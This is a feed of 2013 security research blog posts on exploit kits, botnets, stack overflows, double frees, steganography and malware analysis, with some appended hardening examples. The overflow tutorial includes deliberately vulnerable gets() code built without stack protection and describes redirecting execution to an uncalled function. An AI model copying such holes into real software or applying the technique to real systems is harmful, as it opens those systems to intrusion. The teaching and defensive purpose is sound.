OpenVAS

January 02, 2014

SecPod Research Blog

Exploit Kits: Cybercriminals ultimate weapon


Exploit kits are automated malicious software packages that target vulnerabilities in client-side applications such as web browsers, browser add-ons, Adobe Flash Player, Adobe Reader and the Java Runtime Environment.

Exploit kits are easy to use and do not require in-depth technical knowledge, so inexperienced attackers can use them as well. Cybercriminals sell exploits as a service: a kit can be rented for a day, a week, a month or a year according to need, and the prices are easily affordable.

Exploit Kit Capabilities

Exploit kits come with several capabilities: botnet Command & Control (C&C), fake anti-virus, malware installers, Trojans and spyware. A few exploit kits provide a user-friendly web interface with a powerful control panel, where attackers configure the kit according to their attack plan.

Exploit kits are very sophisticated; they bypass the detection mechanisms of security products by changing their evasion and obfuscation techniques.

How exploit kits work in general:
First, attackers exploit server-side vulnerabilities and add a hidden malicious iframe to a legitimate website. Then they lure users into visiting the compromised website. Once the victim visits the site, the page redirects to the exploit kit hosted on a bulletproof site. Bulletproof hosting is a service offered by some domain/web hosting providers that allows customers to upload anything, including malicious content. The exploit kit collects information such as the browser version and installed add-ons, and the Adobe Flash, Adobe Reader and JRE versions. Based on the collected information, it selects and delivers an exploit for the vulnerable software. If the exploit succeeds, it downloads and installs malware, Trojans, spyware and so on.

Exploit Kit Working

Cybercriminals blacklist IP addresses to keep researchers and security vendors from analyzing the exploits and attacks. When a victim visits the malicious website, the victim's IP address is checked against a back-end database. If it already exists in the DB, the exploit kit responds differently; if it does not, the exploit kit allows access. A few exploit kits receive the blacklisted IP addresses as an update.

Some popular exploit kits are,
- Blackhole
- RedKit
- Neutrino
- Magnitude
- Phoenix
- CRIMEPACK
- Whitehole
- Cool Pack
- Crime Pack
- Neo Sploit
- Nuclear

Exploit kits mainly take advantage of vulnerable software to get into the system. The best way to stay safe is to install applications and add-ons only from authors you trust, and to keep your browsers and other applications up to date. Never click on links in emails from unknown sources, and avoid suspicious websites.

Download Saner and keep your systems updated and secure.

- Veerendra GG

by Veerendra GG at January 02, 2014 11:25 AM

December 27, 2013

SecPod Research Blog

Anti-virus is dead?

Anti-virus or anti-malware is not dead; it is one of the defense mechanisms in a defense-in-depth strategy.

“Anti-virus is dead” is what you generally hear these days from the ‘over-the-top’ campaign makers. And what is the alternative, if so? There has never been a suitable response. Anti-virus and anti-malware products do the job they were meant for quite well. You generally get asked, “Which AV is better?” There are testing companies, surveys and so on to prove one against the other. The majority of these AV products do much the same job, and each of them is about as effective as the other.

So, is anti-virus enough to safeguard your systems? Anti-virus is like going to a doctor after you are infected. The doctor will suspect some kind of infection and may suggest a cure. Then you get repeatedly attacked by different variants and keep visiting your doctor. The human immune system has built-in antibody mechanisms that identify foreign bodies and fight them. Computer firewalls, signature-based malware detection, malware heuristics and behavioral analysis try their best to emulate this, but they are nowhere near the sophistication of the human defensive mechanism.

It is reported that about 67% of malware goes undetected and that about 90% of malware makes use of a vulnerability or misconfiguration in your system. Attackers today have methods to automate the creation of malware, make it polymorphic and keep it undetected. They have automated environments to test the detection rate of AV products and fine-tune their malware.

Anti-virus alone is not enough; the need is multi-level defenses in order to effectively safeguard your system, be it a home computer or a business computer. As an industry, we went wrong with relying only on ‘detect-and-cure’ method.

1. Strengthen the system by fixing vulnerabilities or loopholes and misconfigurations: Stay healthy, stay secure. Majority of the malware today are making use of loopholes, default or misconfigurations in the system to get into the system.
2. A firewall to filter out the unwanted traffic: Open the door to the traffic of your interest.
3. Anti-malware: Product that works based on software reputation or white labeling of all the executables and performs behavioral analysis of each event that take place in the system.
4. Know what is running in your system and monitor regularly.

Building immunity is the first line of defense. Keep your software updated and configure them appropriately.

by Chandra at December 27, 2013 06:17 PM

December 23, 2013

SecPod Research Blog

Dissecting stack based buffer overflow

What is a buffer?

In general, a buffer is temporary storage: a region of memory used to hold data.

Memory Organization:

Memory Allocation

Stack: Contains the arguments passed to a function and its local variables.
Heap: Contains dynamically allocated memory (malloc()).
Data:
– Initialized data segment: Contains global, static and constant data that has an initial value.
– Uninitialized data segment (BSS): Contains uninitialized global and static data.
Code or Text: Contains the actual executable instructions.

More on Stack:

The stack is a LIFO (Last In, First Out) data structure: whatever is put on the stack last is the first thing to be removed. The stack grows towards lower memory addresses (from higher to lower), and ESP points to the top of the stack.

Stack grow down

Stack supports two operations:

PUSH: Push data onto the stack (after the push, ESP is adjusted to point to the new top of the stack).
POP: Remove data from the stack (after the pop, ESP is adjusted to point to the new top of the stack).

What is buffer overflow?

A buffer overflow occurs when data larger than the buffer is written to it without checking the actual size of the buffer. It is caused by improper bounds checking and results in adjacent memory locations being overwritten.

Stack overflow :
- Overwriting a local variable.
- Overwriting the return address.
- Overwriting a function pointer.
- Overwriting a parameter of a different stack frame or a non local address.

Heap overflow :
Generally, heap overflow will happen in the heap area when allocating the memory dynamically using runtime memory allocation techniques.

More on Stack Based overflow:

Let’s consider some sample code which is vulnerable to stack based overflow.

#include <stdio.h>

void Input(void)
{
    char buf[8];

    gets(buf);    /* gets() is dangerous: it does no bounds check, so it overruns buf. */
    puts(buf);

}

int main(void)
{
    Input();

    return 0;
}

In the above code, gets() reads input from the user and writes it into the variable ‘buf’ without checking the size of ‘buf’. If the user supplies more than 8 bytes of data, gets() will still happily write all of it into memory, past the end of the buffer.

Run the program:
Let's go ahead and run the program with input that fits in the buffer.

Normal execution of the program

Here, we gave the input string “SecPod”, which is shorter than the buffer, so the program prints “SecPod” and exits normally.

Now run the program with a larger input.

Abnormal execution of the program

Observe that the given string is “SecPod SecPod”, which is longer than the buffer. When executed, the program throws “Segmentation fault (core dumped)”.

Let’s analyse the source code to understand further.

Vulnerable program stack layout:

Vulnerable program stack layout

Observations:
- Input() takes no arguments, so no arguments are pushed onto the stack.
- When main() transfers control to Input(), it pushes the address of the next instruction, i.e. ‘return 0’, onto the stack as the return address.
- Once execution enters Input(), the old value of EBP is saved and then the local variables are placed on the stack.
- 8 bytes for the buf variable and 4 bytes for the old EBP are stored on the stack.

Now let's try it with GDB to get a better understanding.

Run the program with GDB:

run with gdb

- Compile the program with debug symbols for gdb:
# gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -o stack_bof.o stack_bof.c
- Run the program with gdb:
# gdb ./stack_bof.o
- List the source code in gdb:
(gdb) list
- Set two breakpoints, the first at line 13 and the second at line 7:
(gdb) break 13
Breakpoint 1 at 0x8048425: file stack_bof.c, line 13.
(gdb) break 7
Breakpoint 2 at 0x804840a: file stack_bof.c, line 7.
(gdb)

Disassembled code:

disassemble the code

Stack observation:

Stack observation

Overwritten return address:

return address is overwritten with input string

Execute some crafted code:

Let’s slightly modify the original program code by adding a new function called shouldNotExecute() and compile the program again and run.

#include <stdio.h>

void shouldNotExecute(void)
{

    printf("should not execute\n");

}

void Input(void)
{
    char buf[8];

    gets(buf); /* gets() is dangerous: it does no bounds check, so it overruns buf. */
    puts(buf);
}

int main(void)
{
    Input();
    return 0;
}

Compile the above program:
# gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -o stack_bof.o stack_bof.c

Load it into gdb and get the address of the function shouldNotExecute():
# gdb ./stack_bof.o

Execution of shouldNotExecute() function

Notice that shouldNotExecute() is not called from anywhere. With specially crafted input it is nevertheless possible to execute shouldNotExecute().

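A hardened version of the Input() function above, added here as an example and not part of the original post: fgets() with an explicit size replaces gets(), so the 13-byte “SecPod SecPod” is cut to the 7 characters that fit instead of overwriting the saved EBP and the return address. The helper names (read_line_bounded, demo_read) are my own, and the tmpfile()-based demo_read exists only to feed a constructed input line through the reader.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 8   /* same 8-byte buffer as Input() in the post */

/*
 * Bounded replacement for gets(buf): reads at most size-1 characters into
 * buf, always NUL-terminates it, and drains the rest of an over-long line so
 * the leftover cannot spill into the next read either.
 * Returns 1 if the line was truncated, 0 if it fit, -1 on EOF or error.
 */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    size_t len;
    int truncated = 0;
    int c;

    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;

    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* whole line fit: drop the newline */
        return 0;
    }

    /* No newline in buf: the line was longer than size-1 characters, or EOF
     * ended it. Consume up to the newline; any extra byte means truncation. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

/* Hypothetical test helper: feeds a constructed input line through
 * read_line_bounded() via a temporary file, so the behaviour can be checked
 * without typing at a terminal. */
int demo_read(const char *line, char *buf, size_t size)
{
    FILE *in = tmpfile();
    int rc;

    if (in == NULL)
        return -1;
    fputs(line, in);
    rewind(in);
    rc = read_line_bounded(in, buf, size);
    fclose(in);
    return rc;
}

/* Safe version of the post's Input(): "SecPod SecPod" becomes "SecPod "
 * instead of overwriting the saved EBP and the return address. */
void Input(void)
{
    char buf[BUF_SIZE];
    int rc = read_line_bounded(stdin, buf, sizeof buf);

    if (rc < 0)
        return;                       /* nothing read: buf is not valid */
    if (rc == 1)
        fprintf(stderr, "input truncated to %d bytes\n", BUF_SIZE - 1);
    puts(buf);
}

int main(void)
{
    Input();
    return 0;
}
```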
-AnTu

by Antu at December 23, 2013 11:34 AM

December 17, 2013

SecPod Research Blog

Advanced Power Botnet: Innovative Approach to find Security Vulnerabilities


A new kind of botnet has been uncovered that takes an innovative approach to finding security vulnerabilities in websites, using systems infected with an illegitimate Mozilla Firefox add-on, an investigation by KrebsOnSecurity has revealed.


The “Advanced Power” botnet has already infected more than 12,500 systems. It installs itself as a seemingly legitimate Mozilla Firefox add-on/extension and has helped cybercriminals identify SQL injection vulnerabilities in 1,800 websites.


Once the malware gets into the system, it installs a bogus “Microsoft .NET Framework Assistant” add-on in Mozilla Firefox. The malicious add-on carries the same name as a legitimate add-on, tricking the user into installing it. It then checks every page the victim visits for SQL injection vulnerabilities.


The botnet was first spotted on 31st May 2013 according to the malware analysis service Malwr (SHA256 19b523e0db7d612dd439147956589b0c7fe264f1eb183ea3a74565ad20d3cb8a); at that time only 3 antivirus applications out of 47 (as shown in the picture below) identified it as malicious according to VirusTotal, which is a very low detection rate.

virus-total-so-exe


Advanced Power malware has been distributed at least in part by the Blackhole exploit kit according to “Kafeine” @ Malware Don’t Need Coffee blog.


Mozilla has blocked bogus “Microsoft .NET Framework Assistant (malware)” add-on used by the Advanced Power botnet.

add-on-install-block

mozilla-blocks-bogus-addon


Attackers are using very deep and innovative approaches to bypass various defensive techniques. Antivirus alone is not enough to protect against these attacks. Install applications and add-ons only from authors you trust, and keep your browsers up to date to avoid attacks. Download Saner and keep your systems updated and secure.


- Veerendra GG

by Veerendra GG at December 17, 2013 02:01 PM

December 05, 2013

SecPod Research Blog

The Saner Journey – some random moments

It took us close to nine months to translate our idea into reality. We had debated the idea (for ANCOR, Saner and other products we plan to build) for over three months.
Dropping some features, adding something in the last minute, debates, disagreement, agreement, sleepless nights, real-deep technology discussion, theoretical Computer Science discussion, this make sense, that doesn’t make sense, support of the family members, tension, humor, silence, over engineering, fun, passion, satisfaction, I am sure I have missed out to mention many more emotions here but that was, in general, the journey.
The first step was to prepare an architecture diagram. We put it up in the Centre of our office, where we keep seeing it each day and say, ‘it is just about making this work’. Just seeing that printed poster of the architecture has given us joy. It was put up on the outside of the glass pane of my cabin, so I always saw the other side. Was it intentional?
I thoroughly enjoyed the breakfast meetings where each one had to present ideas, debate on those ideas. One, it is fun to eat and discuss and second, things really get done in the morning hours.
In the first session, when I was presenting the idea to the team, we set a goal to finish the scan in just one minute. On average, security scanners take about 10-15 minutes to do anything meaningful. We knew it was an over-optimistic goal. When we did the prototype it took about 5 minutes, and after more tweaking it came down to under 4 minutes. Was one minute some kind of reality distortion? Maybe not… We have not given up on that!
During the initial days, we thought of a feature which we all agreed was really cool to build. It was about making use of the system resources when the system is idle or when the system is underutilized to scan, so that users don’t feel that the scan is taking away productive time. We discussed this passionately and came out with multiple approaches to find out the usage pattern of the system and arrive at a decision point to perform the scan. We spent a good amount of time prototyping it. But, it was really funny when we found out that Windows already had an API to do just that. Our admiration for the Windows operating system grew, but, we had already spent enough time on it. In the end, we called off the feature because the scan speed was very good and there was no need to find out the optimal time to scan. The user can now scan whenever s/he wants to.
It is August 14th, there is a bug, UI is crashing for no reason, working late evening with the Developer to get that fixed. Tomorrow we have to make a build for the QA. Of course we have tried all possible ways to understand what is going wrong, the backend the front end etc. Frustration is when you do not know what the problem is, solving is the easiest part. We found one function call which was responsible and commented that out which was not needed. It was 12 AM then and I say, “Happy Independence Day!” Tracing back the problem, connecting the dots is fun and it is intellectual high!
There are a few occasions when I have given up on something and I would say, ‘I am ok with it’. But real satisfaction is when the developer is not satisfied with that statement and they go all out and ensure things are built to perfection. Nothing is more satisfying than the whole company working with a single purpose in mind and when everyone takes the role of perfectionist.
I have heard some seemingly strange discussions too, ‘if I put a bracket this side, CPU utilization will be more’, ‘we need to reduce the number of steps in this algorithm’, ‘while() loop, why not an event based listener?’, and many more that brightened up my knowledge on theoretical computer science.
Ideas kept coming till the last days when we had made up our mind for the release. And I have said ‘I don’t want any revolutionary idea now’ to stop them creeping in at the end moment.
We were sitting on a huge pile of vulnerability research content created over 5 years by the team that relentlessly does the research, creates content or signatures and provides solutions on a daily basis. That made the job easy for us.
The videos, website, user guide and FAQ were all done by developers. That is certainly not the norm in the industry. I was coming up with strange ideas for the video when one of the developers realized that it was going to be a disaster and took up the job of creating an awesome video for the product.
Setting goals is easy; translating those into reality is not. Without the effort of the immensely talented, passionate young Engineers, this would have remained a dream. There has been sincere engineering effort, personal sacrifices, late nights, fun, humor and satisfying moments. Hope people who use it find it beneficial.

by Chandra at December 05, 2013 11:04 AM

November 19, 2013

SecPod Research Blog

Introduction to IDA Pro

IDA Pro is primarily a multi-platform, multi-processor disassembler that translates machine executable code into assembly language source code for the purposes of debugging and reverse engineering. It can be used as a local or a remote debugger on various platforms. Plug-ins can be developed for it, and it supports a variety of executable formats for different processors and operating systems.

Here is the screenshot of the IDA Pro Desktop:

IDA desktop

1) The toolbar area is the space below the menu bar where tools can be docked.

2) The navigation band is the horizontal colored band below the toolbar area; it can be used to jump to a particular code region of the executable under analysis. It represents the address space of the executable: light blue stands for library code, red for compiler-generated code and dark blue for user-written code. Code analysis is usually done in the user-written code region.

3) The disassembly window is the primary window, showing the assembly-level code of the executable under analysis. It is available in two formats: graph mode (as shown in the figure above) and text mode. Graph mode represents program control flow: the executable is broken into basic blocks, with colored arrows showing control flow between the blocks. A red arrow means a conditional jump is not taken, a green arrow means the jump is taken, and a blue arrow is an unconditional jump. Text mode presents the entire disassembled code of the executable as a linear listing. In text mode an arrow pointing upwards indicates a loop, unconditional jumps are drawn as solid lines and conditional jumps as dashed lines.

4) The functions window lists all the functions in the executable. It can be used to differentiate functions by length as well as type; it uses flags such as F, L, S and so on to indicate the function type.

5) The names window shows functions, named data, named code and string addresses with a color- and letter-coded name:

      I indicates an imported name,
      F indicates a regular function,
      L indicates a library function,
      D indicates a named data location,
      A indicates an ASCII string data location and
      C indicates named code (a named memory location in the code).

6) The strings window shows the ASCII strings within the executable.

7) The imports window lists all the functions imported by the file under analysis.

8) The exports window shows all the functions and variables that the file under analysis exports for use by other files.

9) The message window is the status window; it displays the output generated by IDA Pro, which may be error messages or the status of ongoing analysis.

Some useful IDA Pro plug-ins are:

1) AsPack/ASPR: A plug-in that unpacks or decompresses files compressed using the ASPack Win32 file compressor.

2) Hex-Rays Decompiler: A plug-in that translates the disassembled code into a C-like source file.

3) Stealth: An open-source plug-in that tries to hide the IDA Pro debugger from the most common anti-debugging techniques.

4) PatchDiff2: An open-source plug-in that compares two IDA Pro database (IDB) files and finds the differences between them.

5) IDAPython: An open-source plug-in that integrates the Python programming language with IDA Pro, allowing Python scripts to run inside IDA Pro.

6) Ida struct: An open-source plug-in that helps recognize high-level objects and structures in binary code.

7) EPF – Entry-Point-Finder: A plug-in that finds the original entry point of a packed or encrypted Windows PE executable.

 

- Shakeel

by Shakeel Bhat at November 19, 2013 01:29 PM

October 31, 2013

SecPod Research Blog

Steganography

Steganography is the art of hiding a message, image or file within another message, image or file.

Images are used most often to hide data. The flexibility of images means that information can be hidden in a variety of ways: it can be scattered across the image data or inserted straight into the file.

If data is inserted straight into the file, we can find it easily using the technique below:

    - Open the image with any hex editor (like HexEdit or HxD on Windows) or use vim in hex mode
    (using the :%!xxd command on Linux).
    - A JPEG image starts with the two bytes “FF D8” (SOI, Start Of Image) and ends with the EOI (End Of Image) marker “FF D9”.
    - If any data has been inserted straight into the image, you can see it after the EOI marker.

Here is an example of inserting data straight into an image on Windows, without any tool:

  1. Create a text file with the data to hide (here I used “hidden data.txt”).
  2. Take the image in which you want to hide it (here I used “original.jpg”).
  3. In the command prompt, use the command below to hide the content:
  4. copy /b original.jpg + "hidden data.txt" "hidden image.jpg"

windows-copy-cmd

A new image will be created with your data hidden. You can open and view that image normally.

But, to view the hidden content open that image in any Hex editor as mentioned above and see the hidden data at the end after the EOI marker.

Hex view

Optionally, a quick obfuscation layer (a password or key) is added on top so that the data is not readable in the hex view; the key or password is then needed to recover the original message.

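An added example (not from the original post) of the detection technique described above, in C: it walks the JPEG marker structure to find the real EOI instead of searching for the last FF D9, which appended data that happens to contain those two bytes would defeat. The sample bytes are constructed and the function names are my own; both single-scan and multi-scan (progressive) files are handled, and a file that cannot be parsed reports 0 trailing bytes.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * Returns the offset just past the real EOI marker (FF D9) of a JPEG held in
 * p[0..n), or 0 if the bytes are not a parseable JPEG. It walks the marker
 * segments rather than searching for the last FF D9, because appended data
 * may itself contain those two bytes.
 */
size_t jpeg_image_end(const unsigned char *p, size_t n)
{
    size_t i = 2;
    int in_scan = 0;                    /* inside entropy-coded data after SOS */

    if (n < 4 || p[0] != 0xFF || p[1] != 0xD8)   /* must start with SOI */
        return 0;

    while (i + 1 < n) {
        unsigned char marker;
        size_t len;

        if (in_scan) {
            /* In scan data FF 00 is a stuffed byte, FF D0..D7 are restart
             * markers and FF FF is padding. Anything else is a real marker. */
            if (p[i] != 0xFF) { i++; continue; }
            marker = p[i + 1];
            if (marker == 0x00 || marker == 0xFF ||
                (marker >= 0xD0 && marker <= 0xD7)) { i += 2; continue; }
            in_scan = 0;                /* fall through and parse the marker */
        }

        if (p[i] != 0xFF)
            return 0;                   /* a segment boundary was expected */
        marker = p[i + 1];
        if (marker == 0xFF) { i++; continue; }              /* fill byte */
        if (marker == 0xD9)
            return i + 2;               /* EOI: the image ends here */
        if (marker >= 0xD0 && marker <= 0xD7) { i += 2; continue; } /* RSTn */
        if (i + 4 > n)
            return 0;
        len = ((size_t)p[i + 2] << 8) | p[i + 3];           /* big-endian length */
        if (len < 2 || i + 2 + len > n)
            return 0;
        i += 2 + len;
        if (marker == 0xDA)             /* SOS: entropy-coded data follows */
            in_scan = 1;
    }
    return 0;                           /* ran out of bytes before EOI */
}

/* Number of bytes appended after the image; 0 if none or if unparseable. */
size_t trailing_bytes(const unsigned char *p, size_t n)
{
    size_t end = jpeg_image_end(p, n);
    return end ? n - end : 0;
}

/* Constructed sample: SOI, an APP0 segment, an SOS segment, a few bytes of
 * scan data (including a stuffed FF 00 and a restart marker), EOI, and then
 * the payload that the post's "copy /b" trick would leave behind. */
static const unsigned char SAMPLE[] = {
    0xFF, 0xD8,                               /* SOI */
    0xFF, 0xE0, 0x00, 0x04, 'J', 'F',         /* APP0, length 4 */
    0xFF, 0xDA, 0x00, 0x02,                   /* SOS, length 2 */
    0x12, 0xFF, 0x00, 0xFF, 0xD0, 0x34,       /* scan data: stuffed FF, RST0 */
    0xFF, 0xD9,                               /* EOI at offsets 18..19 */
    'h', 'i', 'd', 'd', 'e', 'n'              /* appended "hidden" */
};
static const size_t SAMPLE_LEN = sizeof SAMPLE;

size_t sample_image_end(void) { return jpeg_image_end(SAMPLE, SAMPLE_LEN); }
size_t sample_trailing(void)  { return trailing_bytes(SAMPLE, SAMPLE_LEN); }

int main(void)
{
    printf("image ends at offset %zu, %zu trailing byte(s)\n",
           sample_image_end(), sample_trailing());
    return 0;
}
```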
Here is an example of inserting data inside an image using the OutGuess tool. OutGuess is a tool that inserts hidden information into the redundant bits of data sources such as JPEG images.

Data Hiding : outguess -k "secretkey" -d hidden.txt image.jpg out.jpg

    - hidden.txt – Contains text or data to hide
    - image.jpg – Image used to hide data
    - out.jpg – Output Image with Hidden data

outguess-hide

Data Retrieval : outguess -k "secretkey" -r out.jpg hidden.txt


Data-Retrive

 
- Thanga Prakash

by Thanga Prakash at October 31, 2013 05:31 AM

How to Install Windows Softwares on Linux

There are times when we need to run Windows applications (.exe, .msi) on Linux. This can be achieved with the help of Wine.

What is Wine?

Wine is free, open-source software that allows Windows applications to run on Linux. Wine provides a software library (Winelib) against which users can install and run Windows applications.

Installing Wine on Linux (Ubuntu 12.10)

If you prefer to install Wine on Linux (Ubuntu 12.10) from packages, use the system's package manager.

In Ubuntu, open the “Ubuntu Software Center”, search for “Wine”, select it from the list and click ‘Install’.

It will install Wine and its dependencies for you.

If you prefer to install packages from the command line, follow the steps below.

Run the following command to install the latest version of Wine on Ubuntu:

Install Wine in Ubuntu

Confirm the installation by running the wine command,

Installing Wine using Source Code

Download the latest source code from http://www.winehq.org/download/

tar -xf file.tar.bz2
cd dir_name
./configure
make
sudo make install

NOTE: "make install" needs to be run as root, i.e. "sudo make install".

See the INSTALL/README file, which explains the Wine specifics for compiling.

Configure Wine

Run ‘winecfg’ to configure Wine; there you can select the Windows version to present to applications.

$ wine winecfg

Installing Windows Software with Wine

To install, just run the command wine with installer.exe

$ wine “Firefox Setup 12.0.exe”

Now follow the installation steps as you do in Windows,

By default the application will be installed in “~/.wine/drive_c/Program Files/”.

Running Installed applications:

Locate the installed path and run the file with Wine,

:~/.wine/drive_c/Program Files/Mozilla Firefox# wine firefox.exe

Now your Browser is ready to use.

 
- Antu

by Antu at October 31, 2013 05:26 AM

October 30, 2013

SecPod Research Blog

Double Free Vulnerability Basics Explained

One of the most common memory corruption errors found in applications is the “double free” error. It is caused by freeing the same memory location twice, i.e. calling free() twice on the same allocated memory. Below is a sample of code with a “double free” error:

char* Y = (char*)malloc(20);

…….

if (X)
{
    free(Y);
}

……..

free(Y);

It becomes too complex to find such errors in a bunch of files in an application.

 

How is memory allocated?

Consider an application that requests some amount of memory from the OS (Operating System). Usually the OS presents the requested block to the application as if it were one contiguous chunk, but the memory may actually be segregated in different places. The OS usually maintains 2 pointers for each free memory block: the first holds the location of the previous free block and the second holds the location of the next free block. Now consider freeing two memory locations:

free(X)

free(Y)

Consider “A” and “B” to be the two pointers of the “X” memory block and “C” and “D” the two pointers of the “Y” memory block.

A -> 1st pointer of the freed “X” block: holds the previous free memory location
B -> 2nd pointer of the freed “X” block: holds the freed “Y” location (“Y” is next to “X”)
C -> 1st pointer of the freed “Y” block: holds the freed “X” location (“X” is previous to “Y”)
D -> 2nd pointer of the freed “Y” block: holds the next free memory location

It is similar to a doubly-linked list.

So “A” holds the previous free memory location, “B” holds the “Y” location, “C” holds the “X” location and “D” holds the next free memory location.

 

What causes a double free vulnerability?

To trigger a double free vulnerability, the same memory location has to be freed (with free()) twice. Have a look at the first sample code: the variable “Y” is freed twice.

free(Y);    /* freed the first time */

free(Y);    /* freed again, a second time */

When the same allocated memory is freed twice, multiple free-list pointers end up pointing to the same freed memory location.

Later, if new memory is allocated to “Z”, this undesirable condition may lead to memory corruption.

char* Z = (char*)malloc(20);

 

How to avoid double free errors while coding?

One way to avoid double free errors in code is to assign NULL to the pointer after it has been freed once.

char* Y = (char*)malloc(20);

…….

if (X)
{
    free(Y);
    Y = NULL;
}

……..

free(Y);    /* now nothing but free(NULL) */

free(NULL) is a no-op, so the second call does nothing.

To detect this kind of memory corruption error, open-source tools like Valgrind or the GNU Project debugger (GDB) are very handy and help analyze the code better.

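The NULL-after-free pattern above wrapped in a helper, as an added example that is not from the original post: release() takes the address of the pointer so the caller's variable really is reset, and alias_survives() shows the caveat the pattern does not cover, a second copy of the pointer that still dangles. The function names are my own.

```c
#include <stdlib.h>

/*
 * Frees *pp and resets it to NULL in one step. A second release() on the
 * same variable then becomes free(NULL), a no-op, instead of a double free.
 * Returns 1 if memory was actually released, 0 if there was nothing to free.
 */
int release(char **pp)
{
    if (pp == NULL || *pp == NULL)
        return 0;
    free(*pp);
    *pp = NULL;
    return 1;
}

/* The post's pattern, with x deciding whether the early free happens.
 * Returns how many times memory was really released: 1 in both branches. */
int run_pattern(int x)
{
    int freed = 0;
    char *y = malloc(20);

    if (y == NULL)
        return -1;
    if (x)
        freed += release(&y);   /* y is NULL from here on */
    freed += release(&y);       /* safe either way: frees at most once */
    return freed;
}

/* Caveat the pattern does not cover: only the variable passed to release()
 * is cleared, so another copy of the pointer still holds the freed address.
 * Returns 1 when such an alias survives (it always does here). */
int alias_survives(void)
{
    char *y = malloc(20);
    char *alias = y;            /* second reference to the same block */

    if (y == NULL)
        return -1;
    release(&y);                /* y == NULL now, alias is unchanged */
    return alias != NULL;       /* a dangling pointer: never dereference it */
}
```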
 
- Shashi Kiran

by Shashi Kiran at October 30, 2013 01:51 PM

Basic Malware Analysis

Any program that is intended to disrupt computer or network operation, gather sensitive information, gain access to private computer systems or networks is malware. Virus, Spyware, Worm, Adware, Trojan horse, Rootkit, Scareware are all examples of malware. Malware analysis is an art of dissecting the malware in order to understand how it works, and how to defeat or eliminate it.

There are two fundamental approaches to malware analysis:

- Static analysis, which involves examining and analysing the malware without executing it.

- Dynamic analysis, which involves executing the malware on a system and analysing its behaviour.

Static Analysis approach:

  1. The very first step in malware analysis is to run the malware through multiple antivirus programs, which may already have identified it. This can save a lot of time and work. A free online service that analyzes files, enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by various antivirus engines and website scanners, is available at https://www.virustotal.com
  2. Next, hashing is used to uniquely identify the malware. The malicious file is run through a hashing program that produces a hash identifying that file. Searching for that hash online to see whether the file has already been identified can again save a lot of effort. One online malware hash DB can be found at https://isc.sans.edu/tools/hashsearch.html

    MD5 Calculation

  3. Use a strings program like BinText or Strings to display all the strings within the executable. A program contains strings if it prints a message, connects to a URL or copies a file to a specific location. These strings can give an idea of what the executable does. However, if the executable is packed or obfuscated, no useful strings can be seen; in that case dynamic analysis is the option.

    Bin Text in action

  4. Check the dynamically linked libraries of the executable with any of the available tools. The libraries used and the functions called are often the most important parts of a program, and identifying them matters because it lets us guess what the program does. Dependency Walker is one of the commonly used tools; it lists all the modules the executable depends on.

    Dependency Walker listing dependent modules

  5. Finally, the most important and useful static analysis technique is disassembling the executable with an assembly-level disassembler such as IDA Pro. IDA Pro is a multi-platform disassembler that translates machine code into assembly language source. It can run in either text mode or graph mode: text mode simply presents the code as a linear assembly listing, while graph mode divides the code into blocks arranged according to the program's logic, highlighting jumps and branches. Other useful windows IDA Pro provides include the Functions, Strings, Names, Exports, Imports and Structures windows.

    IDA Pro
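Steps 2 and 3 above, hashing and string extraction, as an added example in Python (not part of the original post and not BinText or any SecPod tool). The byte buffer SAMPLE is constructed for the example and is not a real executable; the extraction handles both ASCII and UTF-16LE strings, which is what makes wide Windows API names visible the way BinText shows them.

```python
import hashlib
import re

# Constructed stand-in for a suspicious executable: a few ASCII strings, one
# UTF-16LE (wide) string as Windows binaries commonly carry, and binary noise.
# This is not a real sample; it only exercises the functions below.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"http://example.invalid/update.php\x00"
    + b"\x01\x02\x03\xff\xfe"
    + "CreateRemoteThread".encode("utf-16le") + b"\x00\x00"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    + b"\x7f\x80\x81ab\x00"          # "ab" is shorter than the minimum length
)

def file_hashes(data):
    """Return the MD5, SHA-1 and SHA-256 hex digests of a byte string.
    MD5 is still what most hash lookups key on; SHA-256 avoids collisions."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }

def extract_strings(data, min_len=4):
    """BinText-style extraction: (offset, kind, text) tuples for printable
    ASCII runs and for UTF-16LE runs (printable byte, NUL, repeated)."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append((m.start(), "wide", m.group().decode("utf-16le")))
    return sorted(found)

# Markers that hint at network use, persistence or process injection.
INTERESTING = ("http://", "https://", "CurrentVersion\\Run",
               "CreateRemoteThread", ".exe", ".dll")

def triage_strings(data, min_len=4):
    """Keep only the strings worth a second look during triage."""
    return [s for s in extract_strings(data, min_len)
            if any(marker in s[2] for marker in INTERESTING)]

if __name__ == "__main__":
    for name, digest in file_hashes(SAMPLE).items():
        print(f"{name}: {digest}")
    for off, kind, text in extract_strings(SAMPLE):
        print(f"0x{off:08x} {kind:5} {text}")
    print("flagged:", [t for _, _, t in triage_strings(SAMPLE)])
```

The wide-string pass matters in practice: a packed dropper's ASCII strings are often meaningless, while the UTF-16 API names and registry paths it resolves at run time are still there for the reader who looks for them.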

Dynamic Analysis approach (run the sample only in an isolated virtual machine, snapshotted beforehand and with no route to production networks):

  1. Check file system and process activity with Process Monitor (Procmon), Process Explorer or any other available tool. Procmon records every file, registry, process and network operation it can capture from the moment it is started, while Process Explorer shows the processes running on the system as a tree that makes parent and child relationships visible, which is how a dropper spawning its second stage is spotted.

    Process Monitor

  2. Determine recent registry activity: which keys have been added, deleted or changed while the sample ran. Regshot is a good tool for this purpose: it takes a snapshot of the registry before and after running the executable and reports the differences. Autostart locations such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run are the first place to look for persistence.

    Regshot Snapshot

